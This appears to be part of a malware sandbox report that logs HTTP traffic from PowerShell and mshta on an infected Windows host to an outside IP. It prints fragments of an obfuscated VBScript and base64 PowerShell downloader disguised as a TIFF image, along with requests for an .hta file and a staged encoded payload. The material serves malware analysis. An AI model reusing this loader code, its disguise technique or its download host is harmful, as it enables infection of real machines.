                                                                                                                                                  Nov 18, 2024 18:21:33.487843037 CET1236INData Raw: 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32
                                                                                                                                                  Data Ascii: 25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%
                                                                                                                                                  Nov 18, 2024 18:21:33.487879038 CET1236INData Raw: 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35
                                                                                                                                                  Data Ascii: 52509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%252
                                                                                                                                                  Nov 18, 2024 18:21:33.487899065 CET1236INData Raw: 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30
                                                                                                                                                  Data Ascii: 09%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%252525
                                                                                                                                                  Nov 18, 2024 18:21:33.488842964 CET1236INData Raw: 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32
                                                                                                                                                  Data Ascii: 25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509seT%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%252525
                                                                                                                                                  Nov 18, 2024 18:21:33.488862991 CET1236INData Raw: 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32
                                                                                                                                                  Data Ascii: 25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%
                                                                                                                                                  Nov 18, 2024 18:21:33.488897085 CET1236INData Raw: 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35
                                                                                                                                                  Data Ascii: 52509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%252
                                                                                                                                                  Nov 18, 2024 18:21:33.489988089 CET1236INData Raw: 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30
                                                                                                                                                  Data Ascii: 09%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%252525
                                                                                                                                                  Nov 18, 2024 18:21:33.492578030 CET1236INData Raw: 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32
                                                                                                                                                  Data Ascii: 25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  2192.168.2.2249165107.172.44.178803648C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 18, 2024 18:21:43.137197971 CET379OUTGET /53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIF HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  UA-CPU: AMD64
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                  Host: 107.172.44.178
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Nov 18, 2024 18:21:43.833477020 CET1236INHTTP/1.1 200 OK
                                                                                                                                                  Date: Mon, 18 Nov 2024 17:21:43 GMT
                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                  Last-Modified: Mon, 18 Nov 2024 01:46:22 GMT
                                                                                                                                                  ETag: "227fc-62726156f5f6d"
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  Content-Length: 141308
                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: image/tiff
                                                                                                                                                  Data Raw: ff fe 0d 00 0a 00 0d 00 0a 00 46 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 65 00 6e 00 67 00 6f 00 6d 00 61 00 64 00 65 00 6c 00 61 00 28 00 42 00 79 00 56 00 61 00 6c 00 20 00 63 00 6f 00 72 00 6e 00 6f 00 66 00 6f 00 6e 00 65 00 2c 00 20 00 42 00 79 00 56 00 61 00 6c 00 20 00 6d 00 6f 00 71 00 75 00 65 00 6e 00 63 00 6f 00 2c 00 20 00 42 00 79 00 56 00 61 00 6c 00 20 00 61 00 70 00 72 00 65 00 73 00 61 00 72 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 44 00 69 00 6d 00 20 00 61 00 73 00 73 00 65 00 6e 00 74 00 69 00 6d 00 65 00 6e 00 74 00 6f 00 0d 00 0a 00 20 00 20 00 20 00 20 00 61 00 73 00 73 00 65 00 6e 00 74 00 69 00 6d 00 65 00 6e 00 74 00 6f 00 20 00 3d 00 20 00 49 00 6e 00 53 00 74 00 72 00 28 00 63 00 6f 00 72 00 6e 00 6f 00 66 00 6f 00 6e 00 65 00 2c 00 20 00 6d 00 6f 00 71 00 75 00 65 00 6e 00 63 00 6f 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 44 00 6f 00 20 00 57 00 68 00 69 00 6c 00 65 00 20 00 61 00 73 00 73 00 65 00 6e 00 74 00 69 00 [TRUNCATED]
                                                                                                                                                  Data Ascii: Function engomadela(ByVal cornofone, ByVal moquenco, ByVal apresar) Dim assentimento assentimento = InStr(cornofone, moquenco) Do While assentimento > 0 cornofone = Left(cornofone, assentimento - 1) & apresar & Mid(cornofone, assentimento + Len(moquenco)) assentimento = InStr(assentimento + Len(apresar), cornofone, moquenco) Loop engomadela = cornofoneEnd Functionprivate function ReadStdIn(
                                                                                                                                                  Nov 18, 2024 18:21:43.833553076 CET1236INData Raw: 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 77 00 68 00 69 00 6c 00 65 00 20 00 4e 00 6f 00 74 00 20 00 73 00 74 00 64 00 49 00 6e 00 2e 00 41 00 74 00 45 00 6e 00 64 00 4f 00 66 00 53 00 74 00 72 00 65 00 61 00 6d 00 0d 00 0a 00 20 00 20 00 20
                                                                                                                                                  Data Ascii: ) while Not stdIn.AtEndOfStream ReadStdIn = ReadStdIn & stdIn.ReadAll wendend functionIf Not f
                                                                                                                                                  Nov 18, 2024 18:21:43.833590984 CET1236INData Raw: 00 6d 00 70 00 6c 00 59 00 33 00 4b 00 58 00 4e 00 56 00 46 00 43 00 52 00 50 00 4a 00 53 00 4c 00 55 00 51 00 4d 00 44 00 51 00 67 00 55 00 33 00 6c 00 7a 00 64 00 47 00 56 00 74 00 4c 00 6b 00 35 00 6c 00 64 00 43 00 4b 00 58 00 4e 00 56 00 46
                                                                                                                                                  Data Ascii: mplY3KXNVFCRPJSLUQMDQgU3lzdGVtLk5ldCKXNVFCRPJSLUQMD5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9h
                                                                                                                                                  Nov 18, 2024 18:21:43.833975077 CET1236INData Raw: 00 56 00 34 00 54 00 32 00 59 00 6f 00 63 00 32 00 56 00 5a 00 5a 00 57 00 35 00 6b 00 52 00 6d 00 78 00 68 00 5a 00 79 00 6b 00 37 00 63 00 79 00 63 00 72 00 4a 00 32 00 56 00 5a 00 63 00 33 00 52 00 68 00 63 00 6e 00 52 00 4a 00 62 00 6d 00 52
                                                                                                                                                  Data Ascii: V4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIH" engordamento = engordamento & "NlWWVuZEluZGV4IC1nd
                                                                                                                                                  Nov 18, 2024 18:21:43.834009886 CET848INData Raw: 00 4d 00 6e 00 42 00 50 00 49 00 45 00 5a 00 76 00 63 00 6b 00 55 00 6e 00 4b 00 79 00 64 00 68 00 59 00 32 00 67 00 74 00 54 00 32 00 4a 00 71 00 5a 00 57 00 4e 00 30 00 49 00 48 00 4b 00 58 00 4e 00 56 00 46 00 43 00 52 00 50 00 4a 00 53 00 4c
                                                                                                                                                  Data Ascii: MnBPIEZvckUnKydhY2gtT2JqZWN0IHKXNVFCRPJSLUQMDsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlKXNVFCRPJSLUQMDNjRDb21tYW5kLkxlbmd0aCldO3N
                                                                                                                                                  Nov 18, 2024 18:21:43.834064007 CET1236INData Raw: 00 59 00 57 00 35 00 6b 00 51 00 6e 00 6c 00 30 00 5a 00 58 00 4d 00 70 00 4f 00 33 00 4e 00 6c 00 57 00 58 00 5a 00 68 00 61 00 55 00 31 00 6c 00 64 00 47 00 68 00 76 00 5a 00 43 00 41 00 39 00 49 00 46 00 4b 00 58 00 4e 00 56 00 46 00 43 00 52
                                                                                                                                                  Data Ascii: YW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFKXNVFCRPJSLUQMDsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2
                                                                                                                                                  Nov 18, 2024 18:21:43.834634066 CET272INData Raw: 00 47 00 4b 00 58 00 4e 00 56 00 46 00 43 00 52 00 50 00 4a 00 53 00 4c 00 55 00 51 00 4d 00 44 00 39 00 51 00 64 00 55 00 6b 00 73 00 55 00 48 00 56 00 4a 00 5a 00 47 00 56 00 7a 00 59 00 58 00 4b 00 58 00 4e 00 56 00 46 00 43 00 52 00 50 00 4a
                                                                                                                                                  Data Ascii: GKXNVFCRPJSLUQMD9QdUksUHVJZGVzYXKXNVFCRPJSLUQMDRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycp
                                                                                                                                                  Nov 18, 2024 18:21:43.834670067 CET1236INData Raw: 00 55 00 51 00 4d 00 44 00 55 00 47 00 78 00 68 00 51 00 30 00 55 00 6f 00 4a 00 31 00 42 00 31 00 53 00 53 00 63 00 73 00 57 00 31 00 4e 00 30 00 63 00 6b 00 6c 00 75 00 52 00 31 00 31 00 62 00 51 00 30 00 68 00 42 00 55 00 6c 00 4b 00 58 00 4e
                                                                                                                                                  Data Ascii: UQMDUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUlKXNVFCRPJSLUQMD0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWIC
                                                                                                                                                  Nov 18, 2024 18:21:43.834705114 CET1236INData Raw: 00 55 00 51 00 4d 00 44 00 24 00 4f 00 4b 00 58 00 4e 00 56 00 46 00 43 00 52 00 50 00 4a 00 53 00 4c 00 55 00 51 00 4d 00 44 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 65 00 6e 00 6a 00 75 00 67 00 61 00 72 00 20 00 3d
                                                                                                                                                  Data Ascii: UQMD$OKXNVFCRPJSLUQMD" enjugar = enjugar & "WKXNVFCRPJSLUQMDj" enjugar = enjugar & "KXNVFCRPJSLUQMDuxKX
                                                                                                                                                  Nov 18, 2024 18:21:43.834743023 CET1236INData Raw: 00 6a 00 75 00 67 00 61 00 72 00 20 00 26 00 20 00 22 00 3a 00 55 00 54 00 4b 00 58 00 4e 00 56 00 46 00 43 00 52 00 50 00 4a 00 53 00 4c 00 55 00 51 00 4d 00 44 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 65 00 6e 00 6a
                                                                                                                                                  Data Ascii: jugar & ":UTKXNVFCRPJSLUQMD" enjugar = enjugar & "F8KXNVFCRPJSLUQMD." enjugar = enjugar & "GeKXNVFCRPJS
                                                                                                                                                  Nov 18, 2024 18:21:43.838682890 CET1236INData Raw: 00 56 00 46 00 43 00 52 00 50 00 4a 00 53 00 4c 00 55 00 51 00 4d 00 44 00 53 00 74 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 65 00 6e 00 6a 00 75 00 67 00 61 00 72 00 20 00 3d 00 20 00 65 00 6e 00 6a 00 75 00 67 00 61
                                                                                                                                                  Data Ascii: VFCRPJSLUQMDSt" enjugar = enjugar & "rKXNVFCRPJSLUQMDingKXNVFCRPJSLUQMD($" enjugar = enjugar & "cKXNVFC


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  3192.168.2.2249171107.172.44.178801264C:\Windows\System32\mshta.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 18, 2024 18:21:58.813628912 CET510OUTGET /53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                  UA-CPU: AMD64
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                  If-Modified-Since: Mon, 18 Nov 2024 01:50:06 GMT
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Host: 107.172.44.178
                                                                                                                                                  If-None-Match: "2c929-6272622c7ca10"
                                                                                                                                                  Nov 18, 2024 18:21:59.492672920 CET275INHTTP/1.1 304 Not Modified
                                                                                                                                                  Date: Mon, 18 Nov 2024 17:21:59 GMT
                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                  Last-Modified: Mon, 18 Nov 2024 01:50:06 GMT
                                                                                                                                                  ETag: "2c929-6272622c7ca10"
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                  Connection: Keep-Alive


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  4192.168.2.2249172107.172.44.178802104C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 18, 2024 18:22:16.099082947 CET78OUTGET /53/WRFFRGT.txt HTTP/1.1
                                                                                                                                                  Host: 107.172.44.178
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Nov 18, 2024 18:22:16.764638901 CET1236INHTTP/1.1 200 OK
                                                                                                                                                  Date: Mon, 18 Nov 2024 17:22:16 GMT
                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                  Last-Modified: Mon, 18 Nov 2024 01:44:05 GMT
                                                                                                                                                  ETag: "c558-627260d4938d1"
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  Content-Length: 50520
                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: text/plain
                                                                                                                                                  Data Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                                                                                                                                  Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                  Nov 18, 2024 18:22:16.764700890 CET224INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                  Nov 18, 2024 18:22:16.764936924 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                  Nov 18, 2024 18:22:16.764986038 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                  Nov 18, 2024 18:22:16.764997959 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                  Nov 18, 2024 18:22:16.765120029 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                  Nov 18, 2024 18:22:16.765131950 CET848INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                  Nov 18, 2024 18:22:16.766000986 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                  Nov 18, 2024 18:22:16.766012907 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                  Nov 18, 2024 18:22:16.766025066 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
